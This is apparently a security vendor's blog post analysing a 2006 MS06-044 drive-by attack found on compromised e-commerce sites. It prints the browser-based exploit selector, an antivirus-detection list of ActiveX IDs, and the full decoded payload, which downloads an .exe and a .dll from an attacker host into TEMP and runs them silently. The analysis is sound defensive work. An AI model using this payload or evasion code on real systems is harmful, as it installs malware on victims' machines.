Site icon Panda Security Mediacenter

MS06-044 in the wild

A few days ago some small e-Commerce sites were compromised. You can find more information at [http://www.securityfocus.com/archive/75/455149]. Those sites were being used to distribute payloads for a Microsoft vulnerability, MS06-044 [http://www.microsoft.com/technet/security/Bulletin/MS06-044.mspx].

We have been investigating the files on one of  those servers and we have found javascript code that selects the vulnerability to exploit based on the user's browser, as we can see below:

	switch (system_id) {
	case "ie7":
	case "ie6_xp":
	case "ie6_unknown":
	case "ie6_xpsp2":
		exp_vml();
		break;
	case "ie6_xpsp1":
		exp_vml();
		break;
	case "ie6_xpsp0":
		exp_iscomponentinstalled();
		break;
	case "ie6_2k":
		exp_vml();
		break;
	case "ie5_2k":
		exp_ms06_044();
		break;
	case "ie5_nt":
		break;
	case "ff104":
		exp_ff104();
		break;
	case "ff150":
		exp_ff154();
		break;
	default:
		break;
	}

Also, the code is able to detect if there is an AntiVirus product installed. To do so, it instantiates some CLSID and ActiveX Objects used by the following AV companies:

progs=['NAVCfgWizDll.NAVCfgWizMgr',            //  1 NAV
       'McGDMgr.DwnldGroupMgr'];               //  2 McAfee

cids=['48F45200-91E6-11CE-8A4F-0080C81A28D4',  //  3 trendmicro
      '091EB208-39DD-417D-A5DD-7E2C2D8FB9CB',  //  4 Windows Defender
      'D653647D-D607-4DF6-A5B8-48D2BA195F7B',  //  5 BitDefender Antivirus
      '9F97547E-4609-42C5-AE0C-81C61FFAEBC3',  //  6 AVG7
      '65756541-C65C-11CD-0000-4B656E696100',  //  7 Panda Antivirus
      '1474F601-9B4B-4EB0-81FA-20F753C0E1A4',  //  8 F-Prot
      'D5507020-DB45-11d1-A5F0-00600872F78D',  //  9 Norman Virus Control
      'DD230880-495A-11D1-B064-008048EC2FC5',  // 10 Kaspersky
      'B089FE88-FB52-11D3-BDF1-0050DA34150D',  // 11 Nod32
      '472083B0-C522-11CF-8763-00608CC02F24',  // 12 Avast
      '45AC2688-0253-4ED8-97DE-B5370FA7D48A',  // 13 Antivir
      '8934FCEF-F5B8-468F-951F-78A921CD3920',  // 14 Ewido
      '1EB2409C-6E28-4066-9738-97A1B8F5639C',  // 15 ??
      'E7593602-124B-47C9-9F73-A69308EDC973',  // 16 Dr Web
      'B43CB0C0-84F2-11D6-A18E-00C0DF043BA4']; // 17 VBA32

Now we are going to analyze the MS06-044 payload:

The code is the same published by HD Moore at the Month of Browser Bugs [http://browserfun.blogspot.com/2006/08/ms06-044-internet-explorer-5x.html]. It exploits a local zone privilege escalation vulnerability for Internet Explorer 5 on Windows 2000.

That payload uses the XMLHttpRequest (used in AJAX applications) to download in the background two files: q2l.exe and q1.dll from http://***.cc/q/ to the Windows Temp directory: C:DOCUME~1ADMINI~1CONFIG~1Temp (this directory is obtained from the Windows environment variable TEMP).

Finally the files are executed with the following command line: C:DOCUME~1ADMINI~1CONFIG~1Tempq2l.exe C:DOCUME~1ADMINI~1CONFIG~1Tempq1.dll C:Program FilesInternet Exploreriexplore.exe

The payload is encoded with the "unescape" javascript function. This is the decoded payload:

<html><head></head><body>
<script language='javascript'>
function get_file(xml, o, url, file)
{
        xml.open("GET", url, false);
        xml.send(null);
        var dat = xml.responseBody;
        // xml.close();

        o.Type = 1;
        o.Mode = 3;
        o.Open();
        o.Write(dat);
        o.SaveToFile(file, 2);
        o.Close();
}

function go(server_addr)
{
        //alert("Started ok! server_addr=["+server_addr+"]");

        var s = new ActiveXObject("WScript.Shell");
        var o = new ActiveXObject("ADODB.Stream");
        var e = s.Environment("Process");

        var q1_url  = "http://"+server_addr+"/q/q1.dll";
        var q2l_url = "http://"+server_addr+"/q/q2l.exe";
        var xml = null;
        var q1 = e.Item("TEMP") + "\q1.dll";
        var q2l = e.Item("TEMP") + "\q2l.exe";
        var pf = e.Item("PROGRAMFILES");
        var dat;

        try { xml=new XMLHttpRequest(); }
        catch(e) {
                try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
                catch(e) {
                        xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
                }
        }

        if (!xml) {
                alert("Failed to create XMLHTTP object");
                return(0);
        }

        xml.open("GET", q1_url, false);
        xml.send(null);
        dat = xml.responseBody;

        get_file(xml, o, q1_url, q1);
        get_file(xml, o, q2l_url, q2l);
        var run_cmd = '"'+q2l+'" "'+q1+'" "'+pf+'\Internet Explorer\iexplore.exe"';
        // var run_cmd ='cmd.exe /c calc.exe';
        //alert('Executing the payload: ['+run_cmd+']');
        s.Run(run_cmd, 0);
}

go('***.cc');</script>
</body></html>

We would like to thank Ismael Briones for gathering all this information.

Exit mobile version